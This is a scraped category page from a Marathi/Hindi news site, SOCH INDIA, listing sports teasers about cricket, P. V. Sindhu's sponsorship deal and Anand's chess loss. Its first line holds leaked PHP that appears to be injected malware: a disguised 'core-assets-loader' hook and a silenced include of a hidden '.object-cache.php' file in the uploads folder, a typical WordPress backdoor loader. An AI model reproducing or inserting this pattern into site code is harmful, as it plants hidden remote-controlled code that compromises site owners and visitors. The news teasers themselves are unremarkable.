add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); खेल – SOCH INDIA
Menu

भारताची स्टार बॅडमिंटनपटू पी. व्ही. सिंधूसोबत चीनच्या प्रसिद्ध ली निंग या स्पोर्ट ब्रँड कंपनीने ५० कोटी रुपयांचा करार केला आहे. ली निंग कंपनीची भागीदार कंपनी सनलाइट स्पोर्ट्सचे संचालक महेंद्र कपूर यांनी काल (शुक्रवारी) ही घोषणा केली. कंपनीचा हा करार चार वर्षांसाठी आहे. करारानुसार सिंधूला ४० कोटी रुपये मिळणार आहेत....

Read More

भारतीय संघ हा अत्यंत संतुलित आहे. त्यामुळे २०१९ च्या एकदिवसीय विश्वचषक स्पर्धेत भारत हा विजेतेपदाचा प्रबळ दावेदार असेल, असे मत मास्टर ब्लास्टर सचिनने व्यक्त केले होते. त्यानंतर आता भारतीय संघातील युवा फलंदाज पृथ्वी शॉ आणि शुभमन गिल यांची सचिनने स्तुती केली आहे. पृथ्वी शॉ आणि शुभमन गिल हे दोघे...

Read More

कर्णधार फैजल फजलच्या नेतृत्वाखाली खेळणाऱ्या विदर्भाच्या संघाने सलग दुसऱ्या हंगामात मानाच्या समजल्या जाणाऱ्या रणजी करंडक स्पर्धेचं विजेतेपद पटकावलं आहे. अंतिम सामन्यात विदर्भाने सौराष्ट्रावर 78 धावांनी मात केली. विदर्भाचं हे रणजी करंडकाचं दुसरं विजेतेपद ठरवलं. विदर्भाने विजयासाठी दिलेलं 207 धावांचं आव्हान पार करताना सौराष्ट्राचा संघ 127 धावांपर्यंतच मजल मारु शकला....

Read More

क्रिकेट के मैदान पर कामयाबी की नई परिभाषा गढ़ते जा रहे भारतीय क्रिकेट टीम के कप्तान विराट कोहली मैदान से बाहर छोटी छोटी चीजों में खुशियां तलाशते हैं. वह फिर चाहे पत्नी अनुष्का शर्मा के साथ चांदनी रात में बेंच पर बैठना हो या रोजर फेडरर से खेलों पर...

Read More

भारताचा ‘चौसष्ट घरांचा राजा’ विश्वनाथन आनंद टाटा स्टील बुद्धिबळ स्पर्धेत गुरुवारी पराभूत झाला. विश्वविजेत्या मॅग्नस कार्लसनने दहाव्या फेरीत आनंदला पराभूत केले. या पराभवामुळे आनंदचे सहाव्यांदा विश्वविजेतेपद मिळवण्याचे स्वप्न जवळपास संपुष्टात आले आहे. आनंदने या स्पर्धेत सुरुवातीपासून चांगली कामगिरी केली होती. पण कार्लसनने त्याचा पराभव केला. इतर कोणत्याही खेळाडूकडून आनंद...

Read More

चौथ्या कसोटीत ऑस्ट्रेलियाचा पहिला डाव ३०० धावांवर संपुष्टात आला. भारतीय संघाने ६२२ धावांवर डाव घोषित केल्यानंतर ऑस्ट्रेलियाकडून अपेक्षित झुंज पाहायला मिळाली नाही. सलामीवीर मार्कस हॅरिस वगळता इतर एकाही फलंदाजाला अर्धशतकी खेळी करता आली नाही. विजिगीषू वृत्तीच्या ऑस्ट्रेलियाच्या खेळाडूंनी अशी असमाधानकारक खेळी केल्यामुळे माजी कर्णधार रिकी पॉन्टिंग चांगलाच भडकला. तिसऱ्या...

Read More

पहली पारी में महज 151 रन पर आउट होने के बाद तेज गेंदबाज पैट कमिंस ने शुक्रवार को कहा कि ऑस्ट्रेलियाई बल्लेबाजों को भारतीय कप्तान विराट कोहली और चेतेश्वर पुजारा से सीख लेने की जरूरत है कि एमसीजी की इस पिच पर कैसे पारी को आगे बढ़ाया जाए. पुजारा...

Read More

माजी क्रिकेटपटू मिचेल जॉन्सनची टीका भारत-ऑस्ट्रेलिया कसोटी मालिका भारताचा कर्णधार विराट कोहलीच्या वर्तणुकीवर ऑस्ट्रेलियाचे माजी वेगवान गोलंदाज मिचेल जॉन्सन यांनी कडाडून टीका केली आहे. कोहली हा मूर्ख आणि असभ्य आहे, अशा शब्दांत त्यांनी ताशेरे ओढले आहेत. दुसऱ्या कसोटीत कोहली आणि ऑस्ट्रेलियाचा कर्णधार टिम पेन यांच्यात वारंवार खडाजंगी झाली. पण...

Read More

भारताविरुद्धच्या दुसऱ्या कसोटीत ऑस्ट्रेलियाने १४६ धावांनी विजय मिळवला आणि मालिकेत १-१ अशी बरोबरी केली. शेवटच्या दिवसाचा खेळ सुरु झाला तेव्हा ऑस्ट्रेलियाला ५ गड्यांची आवश्यकता होती. सुमारे तासाभरात ऑस्ट्रेलियाच्या गोलंदाजांनी ५ बळी टिपले आणि सामना खिशात घातला. लॉयन आणि स्टार्कने ३-३ गडी बाद केले. सामन्यात ८ बळी टिपणाऱ्या लॉयनला सलामीवीर...

Read More

भारत विरुद्ध विंडीज दुसऱ्या कसोटीचा तिसऱ्या दिवसाचा खेळ सुरु आहे. या सामन्यात भारताचा पहिला डाव ३६७ धावांत संपुष्टात आला आणि उपहाराची विश्रांती घेण्यात आली. विंडीजचा कर्णधार जेसन होल्डर याने पाच बळी घेत भारताचा डाव लवकर संपवला. काल दुसऱ्या दिवसअखेर भारताने ४ बाद ३०८ धावांपर्यंत मजल मारली होती. त्या धावसंख्येवरून...

Read More